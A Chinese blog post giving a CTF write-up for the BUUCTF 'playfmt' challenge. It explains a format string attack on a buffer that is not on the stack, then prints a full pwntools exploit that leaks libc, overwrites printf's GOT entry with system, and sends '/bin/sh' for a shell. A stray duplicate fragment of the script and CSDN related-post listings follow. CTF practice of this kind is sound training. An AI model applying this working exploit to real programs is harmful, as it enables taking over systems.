Playfmt

最新推荐文章于 2024-06-06 14:58:03 发布
最新推荐文章于 2024-06-06 14:58:03 发布
阅读量97 收藏
点赞数
文章标签: 网络 linux 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55906008/article/details/133269682
版权

Playfmt

buuctf playfmt

非栈上格式化字符串攻击

注意一点是每次输入要补齐200字节,避免read时将两次发送的读到一起.

简单讲下原理:

在这里插入图片描述

找这种三条栈地址的地址链,通过修改0xffdba828(偏移6处)指向0xffdba82c,此时该链条上最末端为0x80485ea,这时再改0xffdba82c指向的地址为printf got表即可,此时栈上可通过栈地址为0xffdba82c处修改got表!

提供本地打通exp,环境不一样,远程就不想调了qaq!

from pwn import *
from LibcSearcher import *

file_path = "./chall/1"
local = 1
remote_path = "node4.buuoj.cn:27003"
elf = ELF("./chall/1")
# libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("/usr/lib/i386-linux-gnu/libc.so.6")


################################  forbidden ####################################
if local != 1:
    p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
else:
    p = process(file_path)

sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rcv     = lambda num            : p.recv(num)
rcv_all = lambda                : p.recv()
rcvu    = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success(name + "-> 0x%x" % data)
ms      = lambda addr,num       : log.success("%s ——> 0x%x",addr,num)


#采用b *<addr>  b *$rebase(<addr>)下断点
def debug(a=''):
    if local:
        if a=='':
            gdb.attach(p)
            pause()
        else:
            gdb.attach(p,a)
    else: pass
################################  forbidden ####################################

get_addr_64 = lambda: u64(rcvu(b"\x7f")[-6:].ljust(8,b"\x00"))
def fmtstr(astr,a):
    payload = astr.format(i for i in a )
    return bytes(payload.encode("utf-8"))
    

############################################################################
##check: arch
##check:local
##check: .so
if __name__ == "__main__":

    context(os='linux', arch='i386')
    # debug("b *0x804854f")
    payload = b"aaaa%6$pbbbb%15$p"
    # debug()
    sdla("=====================",payload)
    rcvu(b"aaaa")
    stack_addr = int(rcv(10),16)
    rcvu(b"bbbb")
    libc_base = int(rcv(10),16)-0x21519
    sys_addr = libc_base + libc.symbols["system"]
    ms("sys_addr",sys_addr)
    ms("stack_addr",stack_addr)
    ms("libc_base",libc_base)
    stack_1 = stack_addr - 0xc
    stack_2 = stack_addr + 0x4
    
    tmp1 = stack_1&0xff
    payload = "%{}c%6$hhn".format(tmp1)
    payload = bytes(payload.encode("utf-8")).ljust(200,b"\x00")  
    sd(payload)
    # p.recvline()
    
    
    tmp2 = 0xa010&0xffff  
    payload ="%{}c%10$hn".format(tmp2)
    payload = bytes(payload.encode("utf-8")).ljust(200,b"\x00")  
    sd(payload)
    sleep(1)
    # p.recvline()
    
    
    tmp3 = stack_2&0xff
    tmp4 = 0xa012
    payload = "%{}c%6$hhn".format(tmp3)
    payload = bytes(payload.encode("utf-8")).ljust(200,b"\x00")  
    
    sd(payload)
    sleep(1)
    # p.recvline()
    

    # debug()
    # debug("b *0x804854f")  #printf 处
    
    #更改偏移为0b处指向printf_got+2
    payload = "%{}c%10$hn".format(tmp4&0xffff)
    payload = bytes(payload.encode("utf-8")).ljust(200,b"\x00")  
    
    sd(payload)
    # sleep(0.1)
    # p.recvline()
    
   
 
    #更改低2字节为system低2字节
    tmp4 = sys_addr & 0xffff
    tmp5 = (sys_addr >> 16) &0xff
    payload = "%{}c%11$hhn%{}c%7$hn".format(tmp5, tmp4-tmp5)
    payload = bytes(payload.encode("utf-8")).ljust(200,b"\x00")
    sd(payload)
    sleep(0.3)

    
    
    payload = b"/bin/sh\x00".ljust(200,b"\x00")
    sd(payload)
    it()

00")
sd(payload)
sleep(0.3)

payload = b"/bin/sh\x00".ljust(200,b"\x00")
sd(payload)
it()
魔瞳。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 658
格式化字符串
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4273
BUUCTF刷题记录
hitcontraining_playfmt
z1r0的博客
03-21 413
hitcontraining_playfmt 查看保护 格式 化漏洞,这个buf在bss上,也就是bss上的格式化漏洞。 攻击思路:可以执行shellcode,所以可以在bss上写入shellcode然后持劫ret_addr到shellcode的开头 既然不是栈上的所以需要借助ebp这个链子来完成 第六个位置是ebp第十个位置是ce78。 先将ce78里存放的ce88给改成ce6c,因为ce6c这里放着ret_addr(因为我们最后就是需要将ret_addr改成shellcode的头) 改完之后ce8
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串在bss段
qq_41667316的博客
07-13 707
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss段,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 534
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
HITCON-Training-Writeup
weixin_30822451的博客
03-14 271
HITCON-Training-Writeup 原文链接M4x@10.0.0.55 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge Introdu...
SUCTF_2019_部分复现
Lethe's Blog
09-01 5063
Web1 CheckIn 1、进入题目后是一个简单的上传页面: 先尝试上传普通的图片马,发现会显示<? in contents!,过滤了<?,可以使用<script language='php'></scrip>绕过。 修改后再次上传发现显示exif_imagetype:not image!,还用了exif_imagetype()进行检验,可以加上GIF89a...
BUUCTF-pwn(9)
njh18790816639的博客
01-05 775
gyctf_2020_borrowstack 使用栈迁移,将rsp迁移到bss段上,而bss段上处于可控位置。但是注意bss段低处处于不可写状态,如果rsp移动到该处,则程序无法进行下去! 尝试使用system函数,但是往往会涉及到bss段低处地址,而one_gadget则不需要过多占用栈地址,故采用one_gadget获取权限! from pwn import * from LibcSearcher import LibcSearcher context(log_level='debug',os='l
TPM 是什么?如何查看电脑的 TPM?
qq_57728300的博客
06-03 1245
或许还有人不知道什么是 TPM,本文带大家了解 TPM 是什么以及如何查看电脑的 TPM。
Java网络编程(上)
qq_34471880的博客
06-01 928
数据在网络的传输, 局域网的概念, 广域网的概念, 网络协议, TCP五层模型, 网络封装 网络分用
网络编程(一)
xuezhe_____的博客
06-03 789
网络的分层模型和每层所使用的协议的集合。
EtherCAT 和 UDP 通讯的实时性 区别
eydj2008的专栏
06-03 372
EtherCAT 使用主从架构,并采用“加工转发”(Processing on the Fly)技术,即数据帧在通过每个从站时被读取或写入,无需存储和重新传输,大大减少了通信延迟。UDP的设计初衷是为了提供快速、低开销的数据传输,适用于那些能够容忍一定数据丢失或不需要可靠传输的应用场景,如音视频流、在线游戏等。虽然UDP本身不提供实时保证,但在某些实时性要求较高的应用中,通过适当的软件设计和网络配置,UDP可以被用于构建实时通信系统。
计算机网络 第一章 计算机网络体系结构
2401_84080967的博客
05-30 956
网络由加上组成,其实准确来说,对于网络还应该加上。其中所谓的节点可以是计算机、路由器、集线器或是路由器,链路是节点之间的连接线路,可以是无线也可以是有线。这就是网络,当使用路由器之后,我们就可以将多个网络连接在一起形成所谓的,也就是网络网络。同时需要注意以下两个名词的表达,小写的internet和大小的Internet,小写的就是泛指多个计算机网络相互连接成为计算机网络,而大写的表示为当经全球最大的特定的计算机网络,采用TCP/IP协议族作为通信协议。
HCIP-Datacom-ARST自选题库__多种协议简答【11道题】
2301_80961833的博客
06-04 532
1.BGP/MPLSIP VPN的典型组网场景如图所示,PE1和PE2通过LoopbackO建立MP-IBGP,PE1和PE2之间只传递VPN路由,其中PE1BGP进程的部分配置已在图中标出,则编号为0的命令不是必须的。(填写阿拉伯数字)32.在如图所示的Hub&Spoke组网中,为了实现路由的正确传递,管理员必须在Hub-PE的BGP-VPN out视图中,手工配置命令peer 10.1.2.10(所有字母小写)allow-as-loop3.如图所示的网络,R1、R2、R4、R5运行IS-IS,区
游戏盾之应用加速,何为应用加速
最新发布
Dexun_chuqi的博客
06-06 514
通过SDK 可以精准识别每个终端当前运行环境风险(虚拟机、模拟器运行、加速器、系统root/越狱、修改器、多开运行、调试/注入/Hook/DUMP)和网络环境 信息(代理、4G/WIFI、链路质量、网络线路、网络延迟)通过设备信誉模型智能评估设备风险等级,为智能调度、身份可信识别提供多维度参考数据,同时辅以智能入侵检测引擎,标记检测到的风险设备,结合精准访问控制可精准拦截识别出 的可疑设备。未来,随着5G网络的发展和人工智能在应用性能优化中的应用,应用加速将迎来更多的机遇和挑战。
使用wireshark分析tcp握手过程
qq_41221841的博客
05-31 322
使用telnet模拟tcp连接。可以看到,一直重试SYN包。
学习笔记——网络参考模型——TCP/IP模型(网络层)
灵韵的博客
06-03 759
整个华为数通学习笔记系列中,本人是以网络视频与网络文章的方式自学的,并按自己理解的方式总结了学习笔记,某些笔记段落中可能有部分文字或图片与网络中有雷同,并非抄袭。当一个主机接口在启动过程中尚未获得自己的IP地址时,就可以向网络发送目的IP地址为有限广播地址、源IP地址为0.0.0.0的DHCP请求报文,希望DHCP服务器在收到自己的请求后,能够给自己分配一个可用的IP地址。实际上一些网络不需要连接到Internet,比如一个大学的封闭实验室内的网络,只要同一网络中的网络设备的IP地址不冲突即可。
计算机网络之快重传和快恢复以及TCP连接与释放的握手
2302_77397775的博客
05-31 1065
(5)A收到后,发出确认报文,确认位ACK为1,确认号ack=w+1,自身序号seq=u+1(前面的FIN报文消耗品个序号,进入时间等待(time-wait)阶段,经过时间等待计时器设置时间的2MSL后,A进入CLOSED状态,MSL叫做最长报文寿命,(1)请求释放链接的一方A先发出连接释放报文段,该报文段FIN终止位为1,序号设为seq=u,u为已传输过的数据最后一个字节➕1,然后再停止发送数据,本身进入FIN-WAIT-1状态,等待接收方确认,规定FIN报文段即使不携带数据,也要好一个序列号。
静态路由原理与配置
2301_80613136的博客
05-30 986
访问Internet时,由于地址条目众多,要配置的静态路由也十分的多,但是对于一些网络出口只有一个,即无论到哪的数据包都需要从这个出口转发出去,这时有没有更简单的配置方法呢?先ARP 广播解析主机B的mac地址,进行第三次封装源IP192.168.1.1目的ip地址192.168.2.2源mac55-55目的66-66。默认路由在某些时候非常有效,当存在末梢网络(Stub Network)时,默认路由会大大简化路由器的配置,减轻管理员的工作负担,提高网络性能。ARP 广播解析出网关的EOde mac地址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值